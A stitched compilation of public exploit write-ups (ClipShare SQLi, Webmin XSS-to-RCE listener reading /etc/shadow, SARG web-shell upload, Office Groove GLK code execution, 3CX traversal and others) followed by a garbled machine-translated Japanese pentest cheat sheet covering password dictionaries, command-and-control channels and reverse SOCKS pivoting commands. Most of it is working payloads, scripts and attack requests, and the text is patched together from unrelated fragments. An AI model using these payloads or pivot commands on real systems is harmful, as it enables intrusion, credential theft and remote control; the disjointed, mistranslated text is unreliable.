        f=open(w,"r")
        print ("Scaning hosts in {}".format(w))
        checker="Poc.jsp"
        for i in f.readlines():
            i=i.strip("\n")
            createPayload(str(i)+"/",checker)
            con=getContent(str(i)+"/",checker)
            if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
                print (str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")
# Exploit Title: ClipShare v7.0 - SQL Injection
# Date: 2017-10-09
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.clip-share.com/
# Software Link: http://www.clip-share.com/
# Version: 7.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-10-09
Product & Service Introduction:
===============================
ClipShare is the first and most popular PHP video script for building highly-profitable video sharing websites.
Technical Details & Description:
================================
SQL injection on [category] URI parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/videos/[category]' AND 5593=5593 AND 'LJPS'='LJPS
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://localhost/[path]/videos/[category]' AND 5593=5593 AND 'LJPS'='LJPS
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: https://localhost/[path]/videos/[category]' AND SLEEP(5) AND 'xNCN'='xNCN
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: Typo3 Restler Extension - Local File Disclosure
# Date: 2017-10-13
# Exploit Author: CrashBandicot @dosperl
# Vendor Homepage: https://www.aoe.com/
# Software Link: https://extensions.typo3.org/extension/restler/
# Tested on : MsWin
# Version: 1.7.0 (last)
# Vulnerability File : getsource.php
3. $file = $_GET['file'];
13. $text = file_get_contents($file);
16. die($file . '<pre id="php">' . htmlspecialchars($text) . "</pre>");
# PoC :
# http://vuln.site/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php
# https://i.imgur.com/zObmaDD.png
# Timeline :
# Vulnerability identified
# Vendor notified
# CVE number requested
# Exploit released
# Exploit Title: phpMyFAQ 2.9.8 Stored XSS
# Vendor Homepage: http://www.phpmyfaq.de/
# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
# Exploit Author: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: webapps
# CVE: CVE-2017-14619
1. Description
Cross-site scripting (XSS) vulnerability in phpMyFAQ through 2.9.8 allows
remote attackers to inject arbitrary web script or HTML via the "Title of
your FAQ" field in the Configuration Module.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14619
https://securityprince.blogspot.fr/2017/10/cve-2017-14619-phpmyfaq-298-cross-site_92.html
2. Proof of Concept
Steps to Reproduce:
1. Open the affected link http://localhost/phpmyfaq/admin/?action=config
with logged in user with administrator privileges
2. Enter <marquee onscroll=alert(document.cookie)> in the “Title of
your FAQ” field
3. Save the Configuration
4. Login using any other user or simply click on the phpMyFAQ on the
top-right hand side of the web portal
3. Solution:
The Vulnerability will be fixed in the next release of phpMyFAQ
# Exploit Title: Vulnerability XSS - Dreambox
# Shodan Dork: Dreambox 200
# Date: 12/10/2017
# Exploit Author: Thiago "THX" Sena
# Vendor Homepage: https://www.dreamboxupdate.com
# Version: 2.0.0
# Tested on: kali linux, windows 7, 8.1, 10
# CVE : CVE-2017-15287
Vulnerability: Cross-site scripting (XSS) in the BouquetEditor plugin
---------------------------------------------------------------
PoC:
- First you go to ( http://IP:PORT/bouqueteditor/ )
- Then you go to the Bouquets tab, add a new bouquet
- Then put the script (<script>alert(1)</script>)
- Xss Vulnerability
[+] SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3430
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WEBMIN-v1.850-REMOTE-COMMAND-EXECUTION.txt
[+] ISR: ApparitionSec
Vulnerability summary
The following advisory describes three (3) vulnerabilities found in Webmin version 1.850
Webmin “is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS,
file sharing and much more. Webmin removes the need to manually edit Unix configuration files like /etc/passwd, and lets you manage a system from
the console or remotely. See the standard modules page for a list of all the functions built into Webmin.”
The vulnerabilities found are:
XSS vulnerability that leads to Remote Code Execution
CSRF Schedule arbitrary commands
Server Side Request Forgery
Credit
An independent security researcher, hyp3rlinx, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
Vendor response
The vendor has released patches to address these vulnerabilities.
For more information: https://github.com/webmin/webmin/commit/0c58892732ee7610a7abba5507614366d382c9c9 and http://www.webmin.com/security.html
Vulnerability details
XSS vulnerability that leads to Remote Code Execution
Under Webmin menu ‘Others/File Manager‘ there is option to download a file from a remote server ‘Download from remote URL‘.
By setting up a malicious server we can wait for file download request then send a XSS payload that will lead to Remote Code Execution.
Webmin echoes back the ‘File Download‘ request status, which is where the XSS is triggered; the Referer check is bypassed by setting the
domain to webmin-victim-ip.
Proof of Concept
import socket
#===================================================
#Run this script and listen for file download from webmin
#Enter payload to execute RCE
#wait for webmin to connect and download file
#Vulnerability is in Menu/Others/File Manager
#issue is webmin echoes back status of the download
#by injecting XSS we bypass the Referer: check by assign
#domain to victims own IP, then execute our RCE
#-----------------------------------------------------------
#e.g.
#Download from remote URL
#http://x.x.x.x:10000/shell/index.cgi
#> whoami
#root
# Listener half of the PoC described above (Python 2 syntax): the Webmin
# instance is pointed at this host as the "remote URL", and whatever this
# socket sends back is what Webmin echoes into its download-status page.
PORT=int(raw_input("[PORT]> ")) #port we listen on for file download requests
WEBMIN_IP=raw_input("[Webmin IP]> ") #victim
#Read /etc/shadow file
CMD=("/><script>document.domain='http://"+WEBMIN_IP+":10000/shell/index.cgi'</script>"+
"<form action='https://"+WEBMIN_IP+":10000/shell/index.cgi' method='POST' enctype='multipart/form-data'>"+
"<input type='hidden' name='cmd' value='cat /etc/shadow'><script>document.forms[0].submit()</script></form>")
s = socket.socket()
HOST = ''  # empty host = bind on all interfaces
s.bind((HOST, PORT))
s.listen(5)
print '\nwebmin file download 0day...'
# One CMD body per accepted connection. The loop has no break, so the
# s.close() after it is never reached; the process ends on Ctrl-C.
while True:
    conn, addr = s.accept()
    conn.send(CMD+'\r\n')
    print 'Connected!'
    print s.recv(1024)
    conn.close()
s.close()
CSRF Schedule arbitrary commands
User-controlled input is not sufficiently sanitized: by sending a GET request to create_job.cgi with the parameters dir=/&cmd=ls,
an attacker can execute arbitrary commands.
Proof of Concept
http://x.x.x.x:10000/at/create_job.cgi?user=root&day=31&month=7&year=2017&hour=2&min=00&dir=/&cmd=ls -lt&mail=0
Server Side Request Forgery
User-controlled input is not sufficiently sanitized: by sending a GET request to tunnel/link.cgi/http://VICTIM-IP:8000 an attacker can trigger
the vulnerability.
Proof of Concept
http://x.x.x.x:10000/tunnel/link.cgi/http://VICTIM-IP:8000
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
====================
Would like to acknowledge Beyond Security’s SSD program for the help with co-ordination of this vulnerability.
More details can be found on their blog at:
https://blogs.securiteam.com/index.php/archives/3430
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
1. ADVISORY INFORMATION
=======================
Product: AlienVault USM
Vendor URL: https://www.alienvault.com
Type: Cross-Site Request Forgery [CWE-253]
Date found: 2017-09-22
Date published: 2017-10-13
CVSSv3 Score: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)
CVE: CVE-2017-14956
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
AlienVault USM 5.4.2 (current)
older versions may be affected too.
4. INTRODUCTION
===============
AlienVault Unified Security Management (USM) is a comprehensive approach to
security monitoring, delivered in a unified platform. The USM platform includes
five essential security capabilities that provide resource-constrained
organizations with all the security essentials needed for effective threat
detection, incident response, and compliance, in a single pane of glass.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
AlienVault USM v5.4.2 offers authenticated users the functionality to generate
and afterwards export compliance reports via the script located at
"/ossim/report/wizard_email.php". Besides offering an export via a local file
download, the script also offers the possibility to send any report via
email to a given address (either in PDF or XLSX format).
An exemplary request to send the pre-defined report
"PCI_DSS_3_2__Vulnerability_Details" to the email address "email () example com"
looks like the following:
https://example.com/ossim/report/wizard_email.php?extra_data=1&name=UENJX0RTU18zXzJfX1Z1bG5lcmFiaWxpdHlfRGV0YWlscw==&format=email&pdf=true&email=email
() example com
The base64-encoded HTTP GET "name" parameter can be replaced with the identifier of any
other of the approx. 240 pre-defined reports that ship with AlienVault USM,
since they all have hardcoded identifiers, such as:
- Alarm_Report
- Ticket_Report
- Business_and_Compliance
- HIPAA_List_of_identified_ePHI_assets
- PCI_DSS_3_2_Database_Users_Added
- VulnerabilitiesReport
etc.
Since there is no anti-CSRF token protecting this functionality, it is
vulnerable to Cross-Site Request Forgery attacks. An exemplary exploit to send
the "PCI_DSS_3_2__Vulnerability_Details" report as a PDF-file to
"email () example com" could look like the following:
<html>
<body>
<form action="https://example.com/ossim/report/wizard_email.php";>
<input type="hidden" name="extra_data" value="1" />
<input type="hidden" name="name" value="UENJX0RTU18zXzJfX1Z1bG5lcmFiaWxpdHlfRGV0YWlscw==" />
<input type="hidden" name="format" value="email" />
<input type="hidden" name="pdf" value="true" />
<input type="hidden" name="email" value="email@example.com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
6. RISK
=======
To successfully exploit this vulnerability a user with rights to access the
compliance reports must be tricked into visiting an arbitrary website while
having an authenticated session in the application.
The vulnerability allows remote attackers to trigger a report generation and
send the report out to an arbitrary email address, which may lead to the
disclosure of very sensitive internal reporting information stored in AlienVault
USM through pre-defined reports such as:
- Alarms
- Assets Inventory
- Compliance Reports such as PCI DSS and HIPAA
- Raw Logs
- Security Events
- Security Operations
- Tickets
- User Activity
7. SOLUTION
===========
None.
8. REPORT TIMELINE
==================
2017-09-22: Discovery of the vulnerability
2017-09-22: Sent full vulnerability details to publicly listed security email
address
2016-10-01: MITRE assigns CVE-2017-14956
2017-10-03: No response from vendor, notified vendor again
2017-10-13: No response from vendor
2017-10-13: Public disclosure according to disclosure policy
9. REFERENCES
=============
https://www.rcesecurity.com/2017/10/cve-2017-14956-alienvault-usm-leaks-sensitive-compliance-information-via-csrf
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14956
Title:
======
3CX Phone System - Authenticated Directory Traversal
Author:
=======
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
CVE-ID:
=======
CVE-2017-15359
Risk Information:
=================
CVSS Base Score: 6.8
CVSS Vector: CVSS3#AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N
Timeline:
=========
2017-08-08 Vulnerability discovered
2017-08-10 Asked for security contact
2017-08-11 Send details to the vendor
2017-09-04 Vendor has confirmed the vulnerability, will be fixed in the next release
2017-10-16 Public disclosure
Affected Products:
==================
3CX Phone System 15.5.3554.1 (Debian based installation)
Vendor Homepage:
================
https://www.3cx.com/phone-system/download-links/
Details:
========
In 3CX Phone System 15.5.3554.1, the Management Console typically listens on port 5001 and is prone to a directory traversal attack:
"/api/RecordingList/DownloadRecord?file=" and "/api/SupportInfo?file=" are the vulnerable parameters. An attacker must be authenticated to exploit
this issue, which gives access to sensitive information that can aid subsequent attacks.
The vulnerabilities were found during a penetration test.
Proof of Concept:
=================
~$ curl -i -k --cookie ".AspNetCore.Cookies=CfDJ8PTIw(...)" https://192.168.0.1:5001/api/SupportInfo?file=/var/lib/3cxpbx/Instance1/Bin/3CXPhoneSystem.ini
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Aug 2017 13:05:16 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
X-3CX-Version: 15.5.3554.1
Content-Disposition: attachment; filename="/var/lib/3cxpbx/Instance1/Bin/3CXPhoneSystem.ini"; filename*=UTF-8''%2Fvar%2Flib%2F3cxpbx%2FInstance1%2FBin%2F3CXPhoneSystem.ini
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15768000
[General]
;connection point to call manager
;used by:
;a) call manager initializes own listener before it connects to configuration server.
;b) components which are working directly with call manager
;MUST NOT be used by components which make connection to configuration server.
;They MUST use CM_API_IP, CM_API_PORT, CM_API_USER and CM_API_PASSWORD paramaeters to make direct connection to CallManagerAPI
pbxSLNIC=127.0.0.1
cmPort=5482
pbxuser=instance_Instance158792
pbxpass=REMOVED
AppPath=/var/lib/3cxpbx/Instance1
AppDataPath=/var/lib/3cxpbx/Instance1
Tenant=Instance1
[ConfService]
;connection point to configuration server for components
confNIC=127.0.0.1
ConfPort=5485
confUser=cfguser_default
confPass=REMOVED
[CfgServerProfile]
;configuration server connection to database
;exclusively used by configuration server
DBHost=127.0.0.1
DBPort=5432
MasterDBUser=phonesystem
MasterDBPassword=REMOVED
MasterTable=phonesystem_mastertable
DefFile=Objects.cls
[QMDatabase]
DBHost=127.0.0.1
DBPort=5432
DBName=database_single
dbUser=logsreader_single
dbPassword=REMOVED
[MIME_TYPES]
MESSAGE=x-chat/control
Fix:
====
Vendor has confirmed the vulnerability, will be fixed in the next release.
# Exploit Title: RCE/Arbitrary file write in Squid Analysis Report Generator (SARG)
# Google Dork: inurl:sarg-php
# Date: 01 September 2017
# Exploit Author: Pavel Suprunyuk
# Vendor Homepage: https://sourceforge.net/projects/sarg/
# Software Link: https://sourceforge.net/projects/sarg/
# Version: Tested on 2.3.10, other versions are vulnerable too.
# Tested on: PHP, any OS
# CVE : None
===================================
sarg-php/sarg-squidguard-block2.php does not require any authentication and allows writing an arbitrary file:
sarg-php/sarg-squidguard-block2.php?file=<your_shell_name.php>&url=<your_php_shell_content>
Exploit example:
the following request
http://vulnerable_site/sarg-php/sarg-squidguard-block2?file=shell.php&url=%3C%3Fphp%20if%20(isset($_GET%5B'cmd'%5D))%20echo%20shell_exec($_GET%5B'cmd'%5D)%3B%20%3F%3E
will write the basic shell "<?php if (isset($_GET['cmd'])) echo shell_exec($_GET['cmd']); ?>" into the "shell.php" file
Title: MS Office Groove 'Workspace Shortcut' Arbitrary Code Execution Vulnerability
Date: September 28th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007 32-bits (x86)
Tested on: Windows 7/Server 2008/Vista/Server 2003/XP (X86 and x64)
CVE: N/A
Description:
MS Office Groove contains a security bypass issue regarding 'Workspace Shortcut' files (.GLK):
it allows arbitrary (registered) URL protocols to be passed, when only 'grooveTelespace://' URLs
should be allowed, which allows execution of arbitrary code upon opening a 'GLK' file.
Usually, URLs are passed to web browsers, but because it uses 'ShellExecute()', if malicious users pass
a 'file:///' URL, it will launch the default application for the file type specified in the URL. Important:
the 'GLK' extension is not in any of the Microsoft blacklists (e.g. Outlook, IE), so it is assumed to be a 'safe' file type. 2 proofs of
concept are provided, one that simply launches 'cmd.exe', and another, remote, that works on any Windows version:
-----poc_cmd_x64.GLK--------------------------------------------------------------------------------
<?xml version='1.0'?><?groove.net version='1.0'?><ns1:ExplorerLink xmlns:ns1="urn:groove.net">
<ns1:NavigationInfo URL="file:///C:\windows\syswow64\cmd.exe"/>
</ns1:ExplorerLink>
----------------------------------------------------------------------------------------------------
-----poc_cmd_x86.GLK--------------------------------------------------------------------------------
<?xml version='1.0'?><?groove.net version='1.0'?><ns1:ExplorerLink xmlns:ns1="urn:groove.net">
<ns1:NavigationInfo URL="file:///C:\windows\system32\cmd.exe"/>
</ns1:ExplorerLink>
----------------------------------------------------------------------------------------------------
-----poc_CPL.GLK------------------------------------------------------------------------------------
<?xml version='1.0'?><?groove.net version='1.0'?><ns1:ExplorerLink xmlns:ns1="urn:groove.net">
<ns1:NavigationInfo URL="file:///\\192.168.0.50\share\CPL_Shortcut.lnk"/>
</ns1:ExplorerLink>
----------------------------------------------------------------------------------------------------
* the 'CPL_Shortcut.lnk' is a special type of shortcut, which doesn´t trigger warnings upon opening,
that can be easily created by dragging a
Windows Control Panel item icon from the Control Panel folder to the Desktop. Notice the item must be
a CPL file, not a special folder (some control panel items are just special types of folder not the
classic CPL file.
The easiest way to do it is:
a) Grab a Windows XP machine (there are lots of Control Panel items that are CPL files)
b) Drag and drop an icon, eg. the 'User Accounts' icon to the Desktop.
c) Open the shortcut file created in the Desktop with an Hex Editor (you may need to rename the file,
removing the '.lnk' extension or some programs will load the target of the shortcut instead of the shortcut
file itself). Edit the portion (in 'Unicode' format) that points to :
c:\windows\system32\nusrmgr.cpl and write an UNC path pointing to a valid CPL file:
\\192.168.0.50\share\cpl_sh.cpl (don´t forget the maximum path length (32 chars) must NOT be exceeded.)
d) Save the file and rename it to "CPL_Shortcut.lnk" and finally place it in the appropriate folder,
which will be accessed from remote, via: \\192.168.0.50\share
e) Using MS Visual Studio (tested with a C++ DLL compiled with VS 2008),
compile a DLL with code of choice and a 'DllMain' function and name it "cpl_sh.cpl".
f) Make sure the share and the 2 files (the .CPL and .LNK) are anonymously accessible from a remote
machine.
That´s it, now just open the 'GLK' files. Both 'cmd.exe' and the CPL file should be executed/loaded.
Notice the files located in the remote share will take longer than 'CMD.exe' to be executed for obvious
reasons, just wait a few seconds.
Title: MS Office Excel (all versions) Arbitrary Code Execution Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007,2010,2013,2016 32/64 bits (x86 and x64)
Tested on: Windows 10/8.1/8.0/7/Server 2012/Server 2008/Vista (X86 and x64)
CVE: 2017-0199
Description:
MS Excel contains a remote code execution vulnerability when processing OLE objects. Although this is a different issue from the
MS Word HTA execution vulnerability, it was patched together with it, 'silently'. By performing some tests based on the Word HTA PoC posted
on exploit-db[dot]com, it's possible to exploit it through Excel too; however, the target would need to either accept a security warning
regarding external links or double-click inside the Excel window. The same applies to PowerPoint, so I guess this is the reason Word caught
the attention and no exploit PoC was made available for the other Office apps.
This vulnerability exists in the way Excel handles parameters passed to the "DDEService" attribute of links, leading to the search for a
program to display it. As it does not impose restrictions on what program is going to be executed, for instance, only programs located in the
Office install directory, it is possible to invoke arbitrary local programs with parameters, leading to system compromise.
Since Excel blocks automatic updating of linked files, the target must be tricked into double-clicking anywhere inside the document
(the linked object occupies basically the whole document window). Without the patch applied no warning/prompt is shown;
with the patch a prompt is shown asking if it's OK to run 'xxxx.exe', where 'xxxx.exe' can have an arbitrary name as long as it's at most 8
chars long, so it could still be faked/spoofed as another Office app (the name cannot be the same as the legitimate one, e.g. 'Excel').
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42995.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1317#c3
The exploit achieves R/W access to the host's physical memory.
This exploit has been tested on the iPhone 7, iOS 10.2 (14C92). To run the exploit against different devices or versions, the symbols must be adjusted.
The attached archive contains the following directories:
-hostapd-2.6 - A modified version of hostapd utilised in the exploit. This version of hostapd is configured to
support 802.11k RRM, and in particular Neighbor Reports. Moreover, this version of hostapd is
instrumented to add various commands, allowing injection and reception of crafted action frames
used throughout the exploit.
-OneRing - The exploit itself.
To run the exploit, you must execute the following steps:
-Connect (and enable) a SoftMAC Wi-Fi dongle to your machine (such as the TL-WN722N)
-Compile the provided version of hostapd
-Modify the "interface" setting under "hostapd-2.6/hostapd/hostapd.conf" to match your interface's name
-Configure the following settings under "OneRing/rrm_exploit/conf.py":
-HOSTAPD_DIR - The directory of the hostapd binary compiled above
-TARGET_MAC - The MAC address of the device being exploited
-AP_MAC - The MAC address of your wireless dongle
-INTERFACE - The name of the wireless dongle's interface
-Configure the following settings under "OneRing/conf.py":
-TARGET_MAC - The MAC address of the device being exploited
-TARGET_IP - The IP address of the device being exploited
-Assemble the backdoor shellcode by running "OneRing/rrm_exploit/assemble_backdoor.sh"
-Assemble each of the code chunks under "OneRing/code_chunks" by running "compile.sh"
-Run hostapd with the configuration file provided above, broadcasting a Wi-Fi network ("test80211k")
-Connect the target device to the network
-Run "OneRing/attack.py"
Following the steps above should result in DART's descriptor being mapped into IO-Space, allowing R/W access to the host's physical memory. You can utilise this R/W access by calling the "read_host_dword" and "write_host_dword" functions, respectively.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42996.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1328
Windows: WLDP/MSHTML CLSID UMCI Bypass
Platform: Windows 10 S (though it should be anything with UMCI)
Class: Security Feature Bypass
Summary:
The enlightened lockdown policy check for COM Class instantiation can be bypassed in MSHTML hosts leading to arbitrary code execution on a system with UMCI enabled (e.g. Device Guard)
Description:
Scripting hosts are supposed to check against the Windows Lockdown Policy (WLDP) before instantiating arbitrary COM classes. This is typically done by calling WldpIsClassInApprovedList from WLDP.DLL before instantiating any COM class. For example in the case of JScript’s ActiveXObject the ProgID is passed to CLSIDFromProgID by the script host and the resulting CLSID is passed to WLDP to determine what’s allowed.
It’s possible to circumvent this check by using the COM TreatAs key to redirect one of the limited (8) allowed CLSIDs to an arbitrary class and get it instantiated. However you can’t do this using ActiveXObject as CLSIDFromProgID will return the resulting CLSID from looking up TreatAs. That said there is a race condition here. However in an MSHTML Local Machine Zone scenario you can bypass it by using an OBJECT tag. In this case MSHTML parses the classid attribute and checks that CLSID against WLDP. It then proceeds to create it using CoCreateInstance which follows TreatAs and creates a different object.
This does require modification of the registry to work, but I think that’s in scope. The reason I’m reporting this one is I think it’s a bug in MSHTML, rather than in an application you can easily block (at least if you want to disable
Proof of Concept:
The PoC is provided as two files: a text file to set up the registry and an HTML file. The registry file is in the REGINI format, which allows it to work on Win10S: while reg.exe and regedit.exe are blocked, regini.exe isn’t. The HTML file can be run inside IE or, my preferred option, HTML Help. You could even make the PoC file a CHM, but I didn’t. The PoC could bootstrap things like untrusted .NET, but for simplicity it doesn’t.
1) Unpack the PoC and ensure the HTML file does NOT have MOTW.
2) From the explorer Run dialog execute “regini path\to\keys.txt”
3) Execute the HTML file from the Run dialog using “hh path\to\shell.html”
Expected Result:
The class creation should fail.
Observed Result:
The class creation succeeded and the HTML file executed notepad.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42997.zip
情報収集
オープンソースインテリジェンス情報コレクション(OSINT)
github
github_nuggests(githubに漏れた敏感な情報を自動的にクロールする):https://github.com/az0ne/github_nuggests
GSIL(15分以内に)ほぼリアルタイムでGitHubでリークされた情報を発見することができます:https://GITHUB.COM/FEEICN/GSIL
X-Patrol(Xiaomiチームの):https://github.com/misecurity/x-patrol
whois query/register counter-ceck/emailカウンターチェック/関連資産
Webmaster's Home :http://whois.chinaz.com/?domainname=target.comws=
ラブステーション:https://whois.aizhan.com/target.com/
Weibu Online :https://X.Threatbook.cn/
IP Counter-Check:https://dns.aizhan.com/
Tianyancha :https://www.tianyancha.com/
Tiger Mom Check :http://ww.whomx.com/
歴史的脆弱性クエリ:オンラインクエリ:http://wy.zone.ci/
自己構築:https://github.com/hanc00l/wooyun_publi/
Googleハッキング
エンタープライズパスワード辞書を作成
辞書リスト
PasswordList:3359Github.com/lavalamp-/password-lists
Pigman Dictionary :https://pan.baidu.com/s/1dfjyedzblasting_dictionary(弱いパスワード、一般的に使用されるパスワード、ディレクトリブラスト、データベースブラスト、編集者ブラスト、背景爆破などを含むさまざまな辞書を共有および収集します。
特定のメーカーの場合、メーカー関連のドメイン名の辞書の構築に焦点を当てています
['%PWD%123'、 '%user%123'、 '%user%521'、 '%user%2017'、 '%pwd%321'、 '%pwd%521'、 '%user%321'、 '%pwd%123!'、 '%pwd%1 23!@# '、'%PWD%1234 '、'%user%2016 '、'%user%123 $%^'、'%user%123!@# '、'%pwd%2016 '、'%pwd%2017 '、'%pwd%1! '、'%pwd%2 @'、'%PWD%3# '、'%PWD%123#@! '、'%PWD%12345 '、'%PWD%123 $%^'、'%PWD% 56 '、'%user%123#@! '、'%user%
パスワード生成
GenPass(漢字を備えた弱いパスワードジェネレーター:33https://GITHUB.COM/RICTERZ/GENPASS/
Passmaker(ルールをカスタマイズできるパスワード辞書ジェネレーター):https://github.com/bit4woo/passmaker
pydictor(強力なパスワードジェネレーター):https://github.com/landgrey/pydictor
メーリングリストGet
TheHarvester:https://github.com/laramies/theharvester
メールアドレスを取得し、アドレス帳をエクスポートします
LinkedInt :https://github.com/mdsecactivebreach/linkedint
Mailet:https://github.com/ridter/mailget
リークパスワードクエリ
ghostproject:3359ghostproject.fr/
pwndb:https://pwndb2am4tzkvold.onion.to/
エンタープライズ外の関連情報のコレクション
サブドメイン名取得
レイヤーサブドメイン掘削機4.2記念バージョン
subdomainsbrute:https://github.com/lijiejie/subdomainsbrute
wydomain:https://github.com/ring04h/wydomain
sublist3r:https://github.com/aboul3la/sublist3r
site:target.com:https://www.google.com
GitHubコードリポジトリ
パケットキャプチャ分析リクエストリクターズ返品値(ジャンプ/ファイルアップロード/APP/APIインターフェイスなど)
Webmasterヘルパーリンクおよびその他のオンライン検索Webサイト
ドメイン送信の脆弱性
Linux
dig @ns.example.com example.com axfr
Windows
nslookup -type=ns xxx.yyy.cn #queryドメイン名を解決するDNSサーバー
nslookup #enter nslookupインタラクティブモード
サーバーdns.domian.com #pecify dns server
LS XXX.YYY.CN #LISTドメイン情報
getDomainsByssl.py :3359Note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b1222222222222222222222222222222222222222222222222222222
censys.io証明書:https://censys.io/certificates?q=target.com
crt.sh証明書クエリ:https://crt.sh/?q=%25.target.com
Shadon :https://www.shodan.io/
Zoomeye :https://www.zoomeye.org/
FOFA :https://FOFA.SO/
Censys:https://Censys.io/
dnsdb.io :https://dnsdb.io/zh-cn/search?q=target.com
api.hackertarget.com :http://api.hackertarget.com/reversedns/?q=target.com
community.riskiq.com :https://community.riskiq.com/search/target.com
subdomain3 :https://github.com/yanxiu0614/subdomain3
Fuzzdomain :https://github.com/chora10/fuzzdomain
dnsdumpster.com :https://dnsdumpster.com/
phpinfo.me :https://phpinfo.me/domain/
DNS Open Data Interface :https://DNS.BUFFEROVER.RUN/DNS?Q=BAIDU.com
イントラネット
を入力しますエンタープライズの弱いアカウントの抜け穴に基づいて
VPN(電子メール、パスワードブラスト、ソーシャルワーカーなどを介してVPNを取得)
エンタープライズ関連の運用およびメンテナンスシステム(Zabbixなど)
システムの脆弱性に基づいて入力
Metasploit(脆弱性エクスプロイトフレームワーク):https://github.com/rapid7/metasploit-framework
スクリプトを悪用します
ウェブサイトのアプリケーションの普及
SQL注入
クロスサイトスクリプト(XSS)
クロスサイトリクエスト偽造(CSRF)
ssrf(ssrf_proxy)
機能/ビジネスロジックの脆弱性
その他の脆弱性など
CMSコンテンツ管理システムの脆弱性
エンタープライズセルフビルドエージェント
ワイヤレスWi-Fiアクセス
シーン攻撃
コマンドとコントロール
ICMP :3359Pentestlab.blog/2017/07/28/Command-and-Control-icmp/
DNS :https://Pentestlab.blog/2017/09/06/command-and-control-dns/
Dropbox :https://Pentestlab.blog/2017/08/29/command-and-control-dropbox/
gmail :https://pentestlab.blog/2017/08/03/command-and-control-gmail/
Telegram :http://drops.xmd5.com/static/drops/tips-16142.html
Twitter :https://Pentestlab.blog/2017/09/26/command-and-control-twitter/
ウェブサイトキーワード:https://Pentestlab.blog/2017/09/14/command-and-control-website-keyword/
Powershell :https://Pentestlab.blog/2017/08/19/command-and-control-powershell/
Windows com :https://pentestlab.blog/2017/09/01/command-and-control-windows-com/
webdav :https://pentestlab.blog/2017/09/12/command-and-control-webdav/
Office 365 :https://www.anquanke.com/post/id/86974
https :https://pentestlab.blog/2017/10/04/command-and-control-https/
Kernel :https://Pentestlab.blog/2017/10/02/command-and-control-kernel/
ウェブサイト:https://Pentestlab.blog/2017/11/14/command-and-control-website/
WMI :https://Pentestlab.blog/2017/11/20/command-and-control-wmi/
WebSocket :https://Pentestlab.blog/2017/12/06/command-and-control-websocket/
画像:https://Pentestlab.blog/2018/01/02/command-and-control-images/
Webインターフェイス:https://Pentestlab.blog/2018/01/03/command-and-control-web-interface/
JavaScript :https://Pentestlab.blog/2018/01/08/command-and-control-javascript/
.
フロンティング
ドメインフロンティング
tor_fronting。
エージェント
VPN
http :http://cn-proxy.com/
トル
インターネットクロスボーダーアプリケーション
イントラネットクロスボーダー転送
NCポート転送
LCXポート転送
NP
プロキシスクリプトTunna
reduh
.
イントラネットクロスボーダープロキシ浸透
ew
フォワードソックスV5サーバー:
./ew -s ssocksd -l 1080
リバウンドソックスV5サーバー:A)最初に、パブリックネットワークIPを使用してホストAで次のコマンドを実行します。
$ ./ew -s rcsocks -l 1080 -e 8888
b)ターゲットホストBで靴下V5サービスを開始し、パブリックホストのポート8888にバウンスします
$ ./ew -s rssocks -d 1.1.1.1 -e 8888
マルチレベルのカスケード
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
LCX_TRANの使用
$ ./EW -S SSOCKSD -L 9999
$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
